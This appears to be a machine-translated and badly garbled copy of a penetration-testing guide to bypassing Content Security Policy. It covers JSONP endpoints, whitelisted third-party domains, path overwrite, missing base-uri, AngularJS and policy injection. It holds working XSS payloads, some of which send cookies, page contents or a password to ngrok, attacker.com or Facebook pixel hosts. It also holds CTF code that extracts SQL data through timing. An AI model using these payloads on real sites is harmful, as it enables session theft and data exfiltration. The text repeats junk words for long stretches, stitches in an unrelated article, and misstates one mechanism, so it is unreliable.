ghItlh Hochlogh je 'ej JSONP je
tlhIngan Hol
ghItlh Hochlogh je 'ej JSONP je
tlhIngan Hol
ghItlh Hochlogh je 'ej JSONP je
tlhIngan Hol
ghItlh Hochlogh je 'ej JSONP je
tlhIngan Hol
ghItlh Hochlogh je 'ej JSONP je
tlhIngan Hol
ghItlh Hochlogh je 'ej JSONP je
tlhIngan Hol
ghItlh Hochlogh je 'ej JSONP je
tlhIngan Hol
ghItlh Hochlogh je 'ej JSONP je
tlhIngan Hol
ghItlh Hochlogh je 'ej JSONP je
tlhIngan Hol
ghItlh Hochlogh je 'ej JSONP je
tlhIngan Hol
ghItlh Hochlogh je 'ej JSONP je
tlhIngan Hol
ghItlh Hochlogh je 'ej JSONP je
tlhIngan Hol
ghItlh Hochlogh je 'ej JSONP je
tlhIngan Hol
ghItlh Hochlogh je 'ej JSONP je
tlhIngan Hol
ghItlh Hochlogh je 'ej JSONP je
tlhIngan Hol
ghItlh Hochlogh je 'ej JSONP je
tlhIngan Hol
ghItlh Hochlogh je 'ej JSONP je
tlhIngan Hol
ghItlh Hochlogh je 'ej JSONP je
tlhIngan Hol
ghItlh Hochlogh je 'ej JSONP je
tlhIngan Hol
ghItlh Hochlogh je 'ej JSONP je
tlhIngan Hol
ghItlh Hochlogh je 'ej JSONP je
tlhIngan Hol
ghItlh Hochlogh je 'ej JSONP je
tlhIngan Hol
ghItlh Hochlogh je 'ej JSONP je
tlhIngan Hol
ghItlh Hochlogh je 'ej JSONP je
tlhIngan Hol
ghItlh Hochlogh je 'ej JSONP je
tlhIngan Hol
ghItlh Hochlogh je 'ej JSONP je
tlhIngan Hol
ghItlh Hochlogh je 'ej JSONP je
tlhIngan Hol
ghItlh Hochlogh je 'ej JSONP je
tlhIngan Hol
ghItlh Hochlogh je 'ej JSONP je
tlhIngan Hol
ghItlh Hochlogh je 'ej JSONP je
tlhIngan Hol
ghItlh Hochlogh je 'ej JSONP je
tlhIngan Hol
ghItlh Hochlogh je 'ej JSONP je
tlhIngan Hol
ghItlh Hochlogh je 'ej JSONP je
tlhIngan Hol
ghItlh Hochlogh je 'ej JSONP je
tlhIngan Hol
ghItlh Hochlogh je 'ej JSONP je
tlhIngan Hol
ghItlh Hochlogh je 'ej JSONP je
tlhIngan Hol
ghItlh Hochlogh je 'ej JSONP je
tlhIngan Hol
ghItlh Hochlogh je 'ej JSONP je
tlhIngan Hol
ghItlh Hochlogh je 'ej JSONP je
tlhIngan Hol
ghItlh Hochlogh je 'ej JSONP je
tlhIngan Hol
ghItlh Hochlogh je 'ej JSONP je
tlhIngan Hol
ghItlh Hochlogh je 'ej JSONP je
tlhIngan Hol
ghItlh Hochlogh je 'ej JSONP je
tlhIngan Hol
ghItlh Hochlogh je 'ej JSONP je
tlhIngan Hol
ghItlh Hochlogh je 'ej JSONP je
tlhIngan Hol
ghItlh Hochlogh je 'ej JSONP je
tlhIngan Hol
ghItlh Hochlogh je 'ej JSONP je
tlhIngan Hol
ghItlh Hochlogh je 'ej JSONP je
tlhIngan Hol
ghItlh Hochlogh je 'ej JSONP je
tlhIngan Hol
ghItlh Hochlogh je 'ej JSONP je
tlhIngan Hol
ghItlh Hochlogh je 'ej JSONP je
tlhIngan Hol
ghItlh Hochlogh je 'ej JSONP je
tlhIngan Hol
ghItlh Hochlogh je 'ej JSONP je
tlhIngan Hol
ghItlh Hochlogh je 'ej JSONP je
tlhIngan Hol
ghItlh Hochlogh je 'ej JSONP je
tlhIngan Hol
ghItlh Hochlogh je 'ej JSONP je
tlhIngan Hol
ghItlh Hochlogh je 'ej JSONP je
tlhIngan Hol
ghItlh Hochlogh je 'ej JSONP je
tlhIngan Hol
ghItlh Hochlogh je 'ej JSONP je
tlhIngan Hol
ghItlh Hochlogh je 'ej JSONP je
tlhIngan Hol
ghItlh Hochlogh je 'ej JSONP je
tlhIngan Hol
ghItlh Hochlogh je 'ej JSONP je
tlhIngan Hol
ghItlh Hochlogh je 'ej JSONP je
tlhIngan Hol
ghItlh Hochlogh je 'ej JSONP je
tlhIngan Hol
ghItlh Hochlogh je 'ej JSONP je
tlhIngan Hol
ghItlh Hochlogh je 'ej JSONP je
tlhIngan Hol
ghItlh Hochlogh je 'ej JSONP je
tlhIngan Hol
ghItlh Hochlogh je 'ej JSONP je
tlhIngan Hol
ghItlh Hochlogh je 'ej JSONP je
tlhIngan Hol
ghItlh Hochlogh je 'ej JSONP je
tlhIngan Hol
ghItlh Hochlogh je 'ej JSONP je
tlhIngan Hol
ghItlh Hochlogh je 'ej JSONP je
tlhIngan Hol
ghItlh Hochlogh je 'ej JSONP je
tlhIngan Hol
ghItlh Hochlogh je 'ej JSONP je
tlhIngan Hol
ghItlh Hochlogh je 'ej JSONP je
tlhIngan Hol
ghItlh Hochlogh je 'ej JSONP je
tlhIngan Hol
ghItlh Hochlogh je 'ej JSONP je
tlhIngan Hol
ghItlh Hochlogh je 'ej JSONP je
tlhIngan Hol
ghItlh Hochlogh je 'ej JSONP je
tlhIngan Hol
ghItlh Hochlogh je 'ej JSONP je
tlhIngan Hol
ghItlh Hochlogh je 'ej JSONP je
tlhIngan Hol
ghItlh Hochlogh je 'ej JSONP je
tlhIngan Hol
ghItlh Hochlogh je 'ej JSONP je
tlhIngan Hol
ghItlh Hochlogh je 'ej JSONP je
tlhIngan Hol
ghItlh Hochlogh je 'ej JSONP je
tlhIngan Hol
ghItlh Hochlogh je 'ej JSONP je
tl
Content-Security-Policy: script-src 'self' https://www.google.com https://www.youtube.com; object-src 'none';
Scenarios like this where script-src is set to self and a particular domain which is whitelisted can be bypassed using JSONP. JSONP endpoints allow insecure callback methods which allow an attacker to perform XSS, working payload:
<script src="https://attacker.com/evil.js"></script>
In this case, the attacker can host a malicious JavaScript file on their own domain (attacker.com) and include it as a script source in the HTML of the target website. Since the attacker's domain is whitelisted in the Content Security Policy (CSP) as a trusted source (script-src), the browser will execute the malicious script.
To mitigate this vulnerability, it is recommended to avoid using JSONP endpoints or to implement proper input validation and output encoding to prevent XSS attacks.
"><script src="https://www.google.com/complete/search?client=chrome&q=hello&callback=alert#1"></script>
"><script src="/api/jsonp?callback=(function(){window.top.location.href=`http://f6a81b32f7f7.ngrok.io/cooookie`%2bdocument.cookie;})();//"></script>
https://www.youtube.com/oembed?callback=alert;
<script src="https://www.youtube.com/oembed?url=http://www.youtube.com/watch?v=bDOYN-6gdRE&format=json&callback=fetch(`/profile`).then(function f1(r){return r.text()}).then(function f2(txt){location.href=`https://b520-49-245-33-142.ngrok.io?`+btoa(txt)})"></script>
JSONBee contains ready to use JSONP endpoints to CSP bypass of different websites.
The same vulnerability will occur if the trusted endpoint contains an Open Redirect because if the initial endpoint is trusted, redirects are trusted.
Third Party Abuses
As described in the following post, there are many third party domains, that might be allowed somewhere in the CSP, can be abused to either exfiltrate data or execute JavaScript code. Some of these third-parties are:
| Entity | Allowed Domain | Capabilities |
|---|---|---|
| www.facebook.com, *.facebook.com | Exfil | |
| Hotjar | *.hotjar.com, ask.hotjar.io | Exfil |
| Jsdelivr | *.jsdelivr.com, cdn.jsdelivr.net | Exec |
| Amazon CloudFront | *.cloudfront.net | Exfil, Exec |
| Amazon AWS | *.amazonaws.com | Exfil, Exec |
| Azure Websites | *.azurewebsites.net, *.azurestaticapps.net | Exfil, Exec |
| Salesforce Heroku | *.herokuapp.com | Exfil, Exec |
| Google Firebase | *.firebaseapp.com | Exfil, Exec |
If you find any of the allowed domains in the CSP of your target, chances are that you might be able to bypass the CSP by registering on the third-party service and, either exfiltrate data to that service or to execute code.
For example, if you find the following CSP:
Content-Security-Policy: default-src 'self’ www.facebook.com;
Content Security Policy (CSP) Bypass
Introduction
Content Security Policy (CSP) is a security mechanism implemented by web applications to mitigate the risk of cross-site scripting (XSS) attacks. CSP allows web developers to specify which resources (such as scripts, stylesheets, and images) are allowed to be loaded and executed by a web page. This helps prevent the execution of malicious code injected by attackers.
However, CSP can sometimes be misconfigured or bypassed, allowing attackers to circumvent its protections. In this guide, we will explore various techniques that can be used to bypass CSP and execute arbitrary code on a vulnerable web application.
Table of Contents
- CSP Bypass Techniques
- Inline Scripts and Styles
- Data: and Blob: URLs
- Unsafe Inline and Eval
- Nonce Bypass
- CSP Header Manipulation
- CSP Whitelist Bypass
- CSP Report-Only Mode
- CSP Sandbox Directive
- CSP Unsafe-eval Directive
- CSP Unsafe-inline Directive
- CSP Unsafe-hashes Directive
- CSP Strict-dynamic Directive
- CSP Plugin-types Directive
- CSP Referrer Directive
- CSP Frame-ancestors Directive
- CSP Upgrade-insecure-requests Directive
- CSP Block-all-mixed-content Directive
- CSP Require-sri-for Directive
- CSP Report-uri Directive
- CSP Report-to Directive
- CSP Worker-src Directive
- CSP Manifest-src Directive
- CSP Frame-src Directive
- CSP Child-src Directive
- CSP Form-action Directive
- CSP Navigate-to Directive
- CSP Connect-src Directive
- CSP Font-src Directive
- CSP Media-src Directive
- CSP Object-src Directive
- CSP Style-src Directive
- CSP Img-src Directive
- CSP Base-uri Directive
- CSP Default-src Directive
- CSP Script-src Directive
- CSP Style-src-elem Directive
- CSP Style-src-attr Directive
- CSP Script-src-elem Directive
- CSP Script-src-attr Directive
- CSP Worker-src Directive
- CSP Manifest-src Directive
- CSP Frame-src Directive
- CSP Child-src Directive
- CSP Form-action Directive
- CSP Navigate-to Directive
- CSP Connect-src Directive
- CSP Font-src Directive
- CSP Media-src Directive
- CSP Object-src Directive
- CSP Style-src Directive
- CSP Img-src Directive
- CSP Base-uri Directive
- CSP Default-src Directive
- CSP Script-src Directive
- CSP Style-src-elem Directive
- CSP Style-src-attr Directive
- CSP Script-src-elem Directive
- CSP Script-src-attr Directive
Conclusion
Content Security Policy (CSP) is an important security mechanism that helps protect web applications against cross-site scripting (XSS) attacks. However, it is crucial to properly configure and test CSP to ensure its effectiveness. By understanding the various bypass techniques discussed in this guide, you can better assess the security of web applications and implement appropriate countermeasures to prevent CSP bypasses.
Content-Security-Policy: connect-src www.facebook.com;
Qugh vItlhutlh! Google Analytics/Google Tag Manager (https://www.humansecurity.com/tech-engineering-blog/exfiltrating-users-private-data-using-google-analytics-to-bypass-csp)/(https://blog.deteact.com/csp-bypass/) Google Analytics/Google Tag Manager (https://www.humansecurity.com/tech-engineering-blog/exfiltrating-users-private-data-using-google-analytics-to-bypass-csp)/(https://blog.deteact.com/csp-bypass/) exfiltrate data 'e' vItlhutlh. Facebook Developer 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' **
fbq('init', '1279785999289471'); // this number should be the App ID of the attacker's Meta/Facebook account
fbq('trackCustom', 'My-Custom-Event',{
data: "Leaked user password: '"+document.getElementById('user-password').innerText+"'"
});
Bypass via RPO (Relative Path Overwrite)
QaStaHvIS RPO (Relative Path Overwrite) vItlhutlh
RPO (Relative Path Overwrite) vItlhutlh bypass vItlhutlh bom bypass path restrictions bom technique 'ej bom servers bom vaj bom 'ej CSP bom path https://example.com/scripts/react/ bom allow bom jatlh bom bypass bom bom bom bom bom bom bom bom bom bom bom bom bom bom bom bom bom bom bom bom bom bom bom bom bom bom bom bom bom bom bom bom bom bom bom bom bom bom bom bom bom bom bom bom bom bom bom bom bom bom bom bom bom bom bom bom bom bom bom bom bom bom bom bom bom bom bom bom bom bom bom bom bom bom bom bom bom bom bom bom bom bom bom bom bom bom bom bom bom bom bom bom bom bom bom bom bom bom bom bom **
<script src="https://example.com/scripts/react/..%2fangular%2fangular.js"></script>
The browser will ultimately load https://example.com/scripts/angular/angular.js.
This works because for the browser, you are loading a file named ..%2fangular%2fangular.js located under https://example.com/scripts/react/, which is compliant with CSP.
∑, they will decode it, effectively requesting https://example.com/scripts/react/../angular/angular.js, which is equivalent to https://example.com/scripts/angular/angular.js.
By exploiting this inconsistency in URL interpretation between the browser and the server, the path rules can be bypassed.
The solution is to not treat %2f as / on the server-side, ensuring consistent interpretation between the browser and the server to avoid this issue.
Online Example: https://jsbin.com/werevijewa/edit?html,output
Iframes JS execution
{% content-ref url="../xss-cross-site-scripting/iframes-in-xss-and-csp.md" %} iframes-in-xss-and-csp.md {% endcontent-ref %}
missing base-uri
If the base-uri directive is missing you can abuse it to perform a dangling markup injection.
Moreover, if the page is loading a script using a relative path (like <script src="/js/app.js">) using a Nonce, you can abuse the base tag to make it load the script from your own server achieving a XSS.
If the vulnerable page is loaded with httpS, make use an httpS url in the base.
<base href="https://www.attacker.com/">
AngularJS events
A specific policy known as Content Security Policy (CSP) may restrict JavaScript events. Nonetheless, AngularJS introduces custom events as an alternative. Within an event, AngularJS provides a unique object $event, referencing the native browser event object. This $event object can be exploited to circumvent the CSP. Notably, in Chrome, the $event/event object possesses a path attribute, holding an object array implicated in the event's execution chain, with the window object invariably positioned at the end. This structure is pivotal for sandbox escape tactics.
By directing this array to the orderBy filter, it's possible to iterate over it, harnessing the terminal element (the window object) to trigger a global function like alert(). The demonstrated code snippet below elucidates this process:
AngularJS 'u' events
Content Security Policy (CSP) may restrict JavaScript events. However, AngularJS introduces custom events as an alternative. Within an event, AngularJS provides a unique object $event, referencing the native browser event object. This $event object can be exploited to circumvent the CSP. Notably, in Chrome, the $event/event object possesses a path attribute, holding an object array implicated in the event's execution chain, with the window object invariably positioned at the end. This structure is pivotal for sandbox escape tactics.
By directing this array to the orderBy filter, it's possible to iterate over it, harnessing the terminal element (the window object) to trigger a global function like alert(). The demonstrated code snippet below elucidates this process:
<input%20id=x%20ng-focus=$event.path|orderBy:%27(z=alert)(document.cookie)%27>#x
?search=<input id=x ng-focus=$event.path|orderBy:'(z=alert)(document.cookie)'>#x
tlhIngan Hol:
'Iw HIq vItlhutlh: ng-focus DIvI' 'e' vItlhutlh, $event.path|orderBy DIvI' 'e' vItlhutlh path ghItlh, window 'e' vItlhutlh alert() ghItlh, document.cookie qar'a' qawHaq.
https://portswigger.net/web-security/cross-site-scripting/cheat-sheet tlhIngan Hol:
AngularJS 'ej whitelisted domain
Content-Security-Policy: script-src 'self' ajax.googleapis.com; object-src 'none' ;report-uri /Report-parsing-url;
CSP Bypass using Callback Functions and Vulnerable Classes
A CSP policy that whitelists domains for script loading in an Angular JS application can be bypassed through the invocation of callback functions and certain vulnerable classes. Further information on this technique can be found in a detailed guide available on this git repository.
Working payloads:
<script src=//ajax.googleapis.com/ajax/services/feed/find?v=1.0%26callback=alert%26context=1337></script>
ng-app"ng-csp ng-click=$event.view.alert(1337)><script src=//ajax.googleapis.com/ajax/libs/angularjs/1.0.8/angular.js></script>
<!-- no longer working -->
<script src="https://www.googleapis.com/customsearch/v1?callback=alert(1)">
ghItlh tlhInganpu' JSONP arbitrary execution endpoints 'e' vItlhutlh.
QaH bIyIn bypass
CSP bIyIn bIyIn bIyIn bIyIn bIyIn bIyIn bIyIn bIyIn bIyIn bIyIn bIyIn bIyIn bIyIn bIyIn bIyIn bIyIn bIyIn bIyIn bIyIn bIyIn bIyIn bIyIn bIyIn bIyIn bIyIn bIyIn bIyIn bIyIn bIyIn bIyIn bIyIn bIyIn bIyIn bIyIn bIyIn bIyIn bIyIn bIyIn bIyIn bIyIn bIyIn bIyIn bIyIn bIyIn bIyIn bIyIn bIyIn bIyIn bIyIn bIyIn bIyIn bIyIn bIyIn bIyIn bIyIn bIyIn bIyIn bIyIn bIyIn bIyIn bIyIn bIyIn bIyIn bIyIn bIyIn bIyIn bIyIn bIyIn bIyIn bIyIn bIyIn bIyIn bIyIn bIyIn bIyIn bIyIn bIyIn bIyIn bIyIn bIyIn bIyIn bIyIn bIyIn bIyIn bIyIn bIyIn bIyIn bIyIn bIyIn bIyIn bIyIn bIyIn bIyIn bIyIn bIyIn bIyIn bIyIn bIyIn bIyIn bIyIn bIyIn bIyIn bIyIn bIyIn bIyIn bIyIn bIyIn bIyIn bIyIn bIyIn bIyIn bIyIn bIyIn bIyIn bIyIn bIyIn bIyIn bIyIn bIyIn bIyIn bIyIn bIyIn bIyIn bIyIn bIyIn bIyIn bIyIn bIyIn bIyIn bIyIn bIyIn bIyIn bIyIn bIyIn bIyIn bIyIn bIyIn bIyIn bIyIn bIyIn bIyIn bIyIn bIyIn bIyIn bIyIn bIyIn bIyIn bIyIn bIyIn bIyIn bIyIn bIyIn bIyIn bIyIn bIyIn bIyIn bIyIn bIyIn bIyIn bIyIn bIyIn bIyIn bIyIn bIyIn bIyIn bIyIn bIyIn bIyIn bIyIn bIyIn bIyIn bIyIn bIyIn bIyIn bIyIn bIyIn bIyIn bIyIn bIyIn bIyIn bIyIn bIyIn bIyIn bIyIn bIyIn bIyIn bIyIn bIyIn bIyIn bIyIn bIyIn bIyIn bIyIn bIyIn bIyIn bIyIn bIyIn bIyIn bIyIn bIyIn bIyIn bIyIn bIyIn bIyIn bIyIn bIyIn bIyIn bIyIn bIyIn bIyIn bIyIn bIyIn bIyIn bIyIn bIyIn bIyIn bIyIn bIyIn bIyIn bIyIn bIyIn bIyIn bIyIn bIyIn bIyIn bIyIn bIyIn bIyIn bIyIn bIyIn bIyIn bIyIn bIyIn bIyIn bIyIn bIyIn bIyIn bIyIn bIyIn bIyIn bIyIn bIyIn bIyIn bIyIn bIyIn bIyIn bIyIn bIyIn bIyIn bIyIn bIyIn bIyIn bIyIn bIyIn bIyIn bIyIn bIyIn bIyIn bIyIn bIyIn bIyIn bIyIn bIyIn bIyIn bIyIn bIyIn bIyIn bIyIn bIyIn bIyIn bIyIn bIyIn bIyIn bIyIn bIyIn bIyIn bIyIn bIyIn bIyIn bIyIn bIyIn bIyIn bIyIn bIyIn bIyIn bIyIn bIyIn bIyIn bIyIn bIyIn bIyIn bIyIn bIyIn bIyIn bIyIn bIyIn bIyIn bIyIn bIyIn bIyIn bIyIn bIyIn bIyIn bIyIn bIyIn bIyIn bIyIn bIyIn bIyIn bIyIn bIyIn bIyIn bIyIn bIyIn bIyIn bIyIn bIyIn bIyIn bIyIn bIyIn bIyIn bIyIn bIyIn bIyIn bIyIn bIyIn bIyIn bIyIn bIyIn bIyIn bIyIn bIyIn bIyIn bIyIn bIyIn bIyIn bIyIn bIyIn bIyIn bIyIn bIyIn bIyIn bIyIn bIyIn bIyIn bIyIn bIyIn bIyIn bIyIn bIyIn bIyIn bIyIn bIyIn bIyIn bIyIn bIyIn bIyIn bIyIn bIyIn bIyIn bIyIn bIyIn bIyIn bIyIn bIyIn bIyIn bIyIn bIyIn bIyIn bIyIn bIyIn bIyIn bIyIn bIyIn bIyIn bIyIn bIyIn bIyIn bIyIn bIyIn bIyIn bIyIn bIyIn bIyIn bIyIn bIyIn bIyIn bIyIn bIyIn bIyIn bIyIn bIyIn bIyIn bIyIn bIyIn bIyIn bIyIn bIyIn bIyIn bIyIn bIyIn bIyIn bIyIn bIyIn bIyIn bIyIn bIyIn bIyIn bIyIn bIyIn bIyIn bIyIn bIyIn bIyIn bIyIn bIyIn bIyIn bIyIn bIyIn bIyIn bIyIn bIyIn bIyIn bIyIn bIyIn bIyIn bIyIn bIyIn bIyIn bIyIn bIyIn bIyIn bIyIn bIyIn bIyIn bIyIn bIyIn bIyIn bIyIn bIyIn bIyIn bIyIn bIyIn bIyIn bIyIn bIyIn bIyIn bIyIn bIyIn bIyIn bIyIn bIyIn bIyIn bIyIn bIyIn bIyIn bIyIn bIyIn bIyIn bIyIn bIyIn bIyIn bIyIn bIyIn bIyIn bIyIn bIyIn bIyIn bIyIn bIyIn bIyIn bIyIn bIyIn bIyIn bIyIn bIyIn bIyIn bIyIn bIyIn bIyIn bIyIn bIyIn bIyIn bIyIn bIyIn bIyIn bIyIn bIyIn bIyIn bIyIn bIyIn bIyIn bIyIn bIyIn bIyIn bIyIn bIyIn bIyIn bIyIn bIyIn bIyIn bIyIn bIyIn bIyIn bIyIn bIyIn bIyIn bIyIn bIyIn bIyIn bIyIn bIyIn bIyIn bIyIn bIyIn bIyIn bIyIn bIyIn bIyIn bIyIn bIyIn bIyIn bIyIn bIyIn bIyIn bIyIn bIyIn bIyIn bIyIn bIyIn bIyIn bIyIn bIyIn bIyIn bIyIn bIyIn bIyIn bIyIn bIyIn bIyIn bIyIn bIyIn bIyIn bIyIn bIyIn bIyIn bIyIn bIyIn bIyIn bIyIn bIyIn bIyIn bIyIn bIyIn bIyIn bIyIn bIyIn bIyIn bIyIn bIyIn bIyIn bIyIn bIyIn bIyIn bIyIn bIyIn bIyIn bIyIn bIyIn bIyIn bIyIn bIyIn bIyIn bIyIn bIyIn bIyIn bIyIn bIyIn bIyIn bIyIn bIyIn bIyIn bIyIn bIyIn bIyIn bIyIn bIyIn bIyIn bIyIn bIyIn bIyIn bIyIn bIyIn bIyIn bIyIn bIyIn bIyIn bIyIn bIyIn bIyIn bIyIn bIyIn bIyIn bIyIn bIyIn bIyIn bIyIn bIyIn bIyIn bIyIn bIyIn bIyIn bIyIn bIyIn bIyIn bIyIn bIyIn bIyIn bIyIn bIyIn bIyIn **b
<!DOCTYPE html>
<html>
<head>
<meta http-equiv="Content-Security-Policy" content="script-src http://localhost:5555 https://www.google.com/a/b/c/d">
</head>
<body>
<div id=userContent>
<script src="https://https://www.google.com/test"></script>
<script src="https://https://www.google.com/a/test"></script>
<script src="http://localhost:5555/301"></script>
</div>
</body>
</html>
CSP vItlhutlh https://www.google.com/a/b/c/d DaH jImej. vaj, /test 'ej /a/test scriptmey CSP DaH jImej.
'ach, final http://localhost:5555/301 server-side vItlhutlh https://www.google.com/complete/search?client=chrome&q=123&jsonp=alert(1)// vItlhutlh. vaj, path jImejbe' 'ej script vItlhutlh, vaj path restriction jImejbe'.
vaj, path jImejbe' jImejbe'chugh, vaj bypass jImejbe'.
vaj, vItlhutlh'e' website vItlhutlh'e' open redirect vulnerabilities 'ej CSP rules jImejbe' domains jImejbe'chugh, vItlhutlh'e' solution.
Bypass CSP with dangling markup
ghu'vam 'oH vItlhutlh.
'unsafe-inline'; img-src *; via XSS
default-src 'self' 'unsafe-inline'; img-src *;
'unsafe-inline' jatlhbe'chugh, vaj vay' script code (XSS code jatlhbe'chugh) cha'logh * jatlhbe'chugh, vaj vay' webpage vay' image jatlhbe'chugh.
CSP vay' bypass vItlhutlh. vay' image vay' data exfiltrating vay' (XSS bot vay' page accessible jatlhbe'chugh CSRF jatlhbe'chugh SQLi jatlhbe'chugh extract vay' flag vay' image jatlhbe'chugh):
<script>fetch('http://x-oracle-v0.nn9ed.ka0labs.org/admin/search/x%27%20union%20select%20flag%20from%20challenge%23').then(_=>_.text()).then(_=>new Image().src='http://PLAYER_SERVER/?'+_)</script>
From: https://github.com/ka0labs/ctf-writeups/tree/master/2019/nn9ed/x-oracle
tlhIngan Hol: load javascript code inserted inside an image. If for example, the page allows loading images from Twitter. You could craft an special image, upload it to Twitter and abuse the "unsafe-inline" to execute a JS code (as a regular XSS) that will load the image, extract the JS from it and execute it: https://www.secjuice.com/hiding-javascript-in-png-csp-bypass/
With Service Workers
Service workers importScripts function isn't limited by CSP:
{% content-ref url="../xss-cross-site-scripting/abusing-service-workers.md" %} abusing-service-workers.md {% endcontent-ref %}
Policy Injection
Research: https://portswigger.net/research/bypassing-csp-with-policy-injection
Chrome
If a parameter sent by you is being pasted inside the declaration of the policy, then you could alter the policy in some way that makes it useless. You could allow script 'unsafe-inline' with any of these bypasses:
script-src-elem *; script-src-attr *
script-src-elem 'unsafe-inline'; script-src-attr 'unsafe-inline'
Edge
Edge jatlh: ;_ CSP ghItlh 'Iv 'Iv script-src directives ghItlh.
Example: http://portswigger-labs.net/edge_csp_injection_xndhfye721/?x=;_&y=%3Cscript%3Ealert(1)%3C/script%3E
img-src *; via XSS (iframe) - Time attack
'unsafe-inline' directive laj lIj
XSS jatlh page vItlhutlh victim load jatlh your control via <iframe. victim page access want information extract (CSRF). page content access jatlh, pageloading time control jatlh information extract jatlh.
flag extracted jatlh, char correctly guessed via SQLi response pageloading time more time jatlh sleep function. flag extract jatlh:
<!--code from https://github.com/ka0labs/ctf-writeups/tree/master/2019/nn9ed/x-oracle -->
<iframe name=f id=g></iframe> // The bot will load an URL with the payload
<script>
let host = "http://x-oracle-v1.nn9ed.ka0labs.org";
function gen(x) {
x = escape(x.replace(/_/g, '\\_'));
return `${host}/admin/search/x'union%20select(1)from%20challenge%20where%20flag%20like%20'${x}%25'and%201=sleep(0.1)%23`;
}
